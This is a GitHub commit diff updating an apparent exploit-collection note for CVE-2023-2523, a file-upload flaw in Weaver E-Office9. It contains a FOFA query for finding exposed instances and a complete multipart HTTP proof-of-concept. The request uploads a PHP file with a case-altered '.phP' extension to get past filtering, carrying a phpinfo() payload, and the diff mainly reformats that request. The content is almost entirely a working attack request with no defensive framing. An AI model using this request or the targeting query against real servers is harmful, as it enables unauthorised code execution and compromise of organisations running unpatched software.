Skip to content

Commit

Permalink
Update 某微E-Office9文件上传漏洞_CVE-2023-2523.md
Browse files Browse the repository at this point in the history
  • Loading branch information
wy876 authored Jan 7, 2024
1 parent 6b21d3d commit d7cc07a
Showing 1 changed file with 26 additions and 12 deletions.
38 changes: 26 additions & 12 deletions 某微E-Office9文件上传漏洞_CVE-2023-2523.md
Original file line number Diff line number Diff line change
@@ -1,20 +1,34 @@
## 某微E-Office9文件上传漏洞 CVE-2023-2523

## fofa
```
POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host:192.168.233.10:8082
Cache-Control:max-age=0
Upgrade-Insecure-Requests:1
Origin:null
Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Accept-Encoding:gzip, deflate
Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection:close
app="泛微-EOffice"
```

## poc
```
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: XXXX:XXX
Content-Length: 349
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition:form-data; name="upload_quwan"; filename="1.php."
Content-Type:image/jpeg
<?phpphpinfo();?>
Content-Disposition: form-data; name="upload_quwan"; filename="1.phP"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
```

0 comments on commit d7cc07a

Please sign in to comment.